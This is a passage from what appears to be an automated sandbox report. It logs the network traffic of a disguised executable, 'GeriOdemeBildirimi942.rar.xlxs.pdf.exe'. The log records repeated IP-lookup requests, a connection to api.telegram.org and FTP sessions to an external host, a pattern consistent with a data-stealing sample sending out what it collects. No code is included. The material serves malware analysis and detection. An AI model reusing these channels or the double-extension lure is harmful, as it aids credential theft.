Oct 3, 2024 09:16:54.750627041 CEST	49743	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:54.754133940 CEST	49741	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:54.755223989 CEST	49744	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:54.761265039 CEST	80	49744	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:54.761413097 CEST	49744	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:54.761528969 CEST	80	49741	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:54.761554956 CEST	49744	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:54.761583090 CEST	49741	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:54.768351078 CEST	80	49744	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:55.603022099 CEST	80	49744	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:55.604402065 CEST	49745	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:55.604458094 CEST	443	49745	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:55.604547024 CEST	49745	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:55.604783058 CEST	49745	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:55.604805946 CEST	443	49745	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:55.656387091 CEST	49744	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:56.068284988 CEST	443	49745	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:56.070616007 CEST	49745	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:56.070636988 CEST	443	49745	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:56.197021008 CEST	443	49745	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:56.197154999 CEST	443	49745	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:56.197253942 CEST	49745	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:56.197727919 CEST	49745	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:56.200707912 CEST	49744	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:56.202023983 CEST	49746	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:56.206629992 CEST	80	49744	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:56.206742048 CEST	49744	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:56.207082987 CEST	80	49746	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:56.207165956 CEST	49746	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:56.207454920 CEST	49746	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:56.212866068 CEST	80	49746	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:59.044066906 CEST	80	49746	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:59.059192896 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:59.059252977 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:59.059345961 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:59.059837103 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:59.059856892 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:59.093939066 CEST	49746	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:59.754415989 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:59.754576921 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:59.755928040 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:59.755938053 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:59.756185055 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:59.758029938 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:59.803401947 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:17:00.034333944 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:17:00.034410954 CEST	443	49747	149.154.167.220	192.168.2.7
Oct 3, 2024 09:17:00.034537077 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:17:00.035001993 CEST	49747	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:17:05.199130058 CEST	49731	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:17:05.368278980 CEST	49746	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:17:05.368696928 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:05.382683039 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:05.382846117 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:05.383779049 CEST	80	49746	132.226.8.169	192.168.2.7
Oct 3, 2024 09:17:05.383851051 CEST	49746	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:17:06.264187098 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:06.264745951 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:06.269742012 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:06.609932899 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:06.610325098 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:06.615516901 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:07.288722038 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:07.288908958 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:07.297192097 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:07.635574102 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:07.635885954 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:07.640856028 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:07.979543924 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:07.980005026 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:07.987647057 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:08.339272976 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:08.339668036 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:08.347855091 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:08.688160896 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:08.689057112 CEST	49749	47782	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:08.695334911 CEST	47782	49749	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:08.695496082 CEST	49749	47782	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:08.695727110 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:08.701699972 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:09.608916044 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:09.609195948 CEST	49749	47782	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:09.609239101 CEST	49749	47782	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:09.621499062 CEST	47782	49749	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:09.622524023 CEST	47782	49749	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:09.622590065 CEST	49749	47782	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:09.656536102 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:09.961546898 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:09.961678028 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:09.961956978 CEST	47782	49749	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:09.962003946 CEST	49749	47782	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:09.964710951 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:09.972121000 CEST	47782	49749	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:10.015815973 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:11.471400023 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:11.478106976 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:11.816059113 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:11.816561937 CEST	49750	32582	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:11.821526051 CEST	32582	49750	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:11.821603060 CEST	49750	32582	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:11.821758986 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:11.826894045 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:12.700716972 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:12.701045990 CEST	49750	32582	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:12.701086044 CEST	49750	32582	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:12.705919981 CEST	32582	49750	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:12.706348896 CEST	32582	49750	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:12.706404924 CEST	49750	32582	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:12.750207901 CEST	49748	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:17:13.044482946 CEST	21	49748	119.18.54.39	192.168.2.7
Oct 3, 2024 09:17:13.094000101 CEST	49748	21	192.168.2.7	119.18.54.39

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:16:26.701783895 CEST	52078	53	192.168.2.7	1.1.1.1
Oct 3, 2024 09:16:26.709033966 CEST	53	52078	1.1.1.1	192.168.2.7
Oct 3, 2024 09:16:27.401612997 CEST	51328	53	192.168.2.7	1.1.1.1
Oct 3, 2024 09:16:27.413845062 CEST	53	51328	1.1.1.1	192.168.2.7
Oct 3, 2024 09:16:34.100999117 CEST	51824	53	192.168.2.7	1.1.1.1
Oct 3, 2024 09:16:34.108045101 CEST	53	51824	1.1.1.1	192.168.2.7
Oct 3, 2024 09:16:41.197192907 CEST	60286	53	192.168.2.7	1.1.1.1
Oct 3, 2024 09:16:41.204004049 CEST	53	60286	1.1.1.1	192.168.2.7
Oct 3, 2024 09:16:47.478091955 CEST	53913	53	192.168.2.7	1.1.1.1
Oct 3, 2024 09:16:48.158492088 CEST	53	53913	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 09:16:26.701783895 CEST	192.168.2.7	1.1.1.1	0xfe18	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:27.401612997 CEST	192.168.2.7	1.1.1.1	0x6a51	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:34.100999117 CEST	192.168.2.7	1.1.1.1	0x35ef	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:41.197192907 CEST	192.168.2.7	1.1.1.1	0x407a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:47.478091955 CEST	192.168.2.7	1.1.1.1	0x7f4f	Standard query (0)	awaratrendz.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 09:16:26.709033966 CEST	1.1.1.1	192.168.2.7	0xfe18	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2024 09:16:26.709033966 CEST	1.1.1.1	192.168.2.7	0xfe18	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:26.709033966 CEST	1.1.1.1	192.168.2.7	0xfe18	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:26.709033966 CEST	1.1.1.1	192.168.2.7	0xfe18	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:26.709033966 CEST	1.1.1.1	192.168.2.7	0xfe18	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:26.709033966 CEST	1.1.1.1	192.168.2.7	0xfe18	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:27.413845062 CEST	1.1.1.1	192.168.2.7	0x6a51	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:27.413845062 CEST	1.1.1.1	192.168.2.7	0x6a51	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:34.108045101 CEST	1.1.1.1	192.168.2.7	0x35ef	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2024 09:16:34.108045101 CEST	1.1.1.1	192.168.2.7	0x35ef	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:34.108045101 CEST	1.1.1.1	192.168.2.7	0x35ef	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:34.108045101 CEST	1.1.1.1	192.168.2.7	0x35ef	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:34.108045101 CEST	1.1.1.1	192.168.2.7	0x35ef	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:34.108045101 CEST	1.1.1.1	192.168.2.7	0x35ef	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:41.204004049 CEST	1.1.1.1	192.168.2.7	0x407a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:16:48.158492088 CEST	1.1.1.1	192.168.2.7	0x7f4f	No error (0)	awaratrendz.com		119.18.54.39	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49705	193.122.130.0	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:26.726809978 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:27.191643953 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a20097eec4d33ba799f13ee1be510d50 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:16:27.199314117 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:27.298789978 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fa5adc8988c978fa0865fa5dd5e5cfd1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:16:28.241403103 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:28.342165947 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e1a88024c56111a173471825bf0afc05 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49709	193.122.130.0	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:29.045275927 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:29.520260096 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 59a0e9b2fc9cde185c02be14a48319fb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49711	193.122.130.0	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:30.533427954 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:30.994785070 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3393b0c267dd03fa2085816268c69d81 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49713	193.122.130.0	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:31.639698982 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:32.105354071 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 363a8c70c042c6210594e31f72a618fa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49715	193.122.130.0	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:32.718421936 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:33.174551010 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4a19b960a1fea13c4d1c2ca5c6dc2f72 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49717	132.226.8.169	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:34.121454954 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:35.101963043 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:16:35.130139112 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49721	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:35.643624067 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:37.442477942 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:16:37.446181059 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:38.949093103 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:16:40.879057884 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:43.025032997 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49722	132.226.8.169	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:35.755408049 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
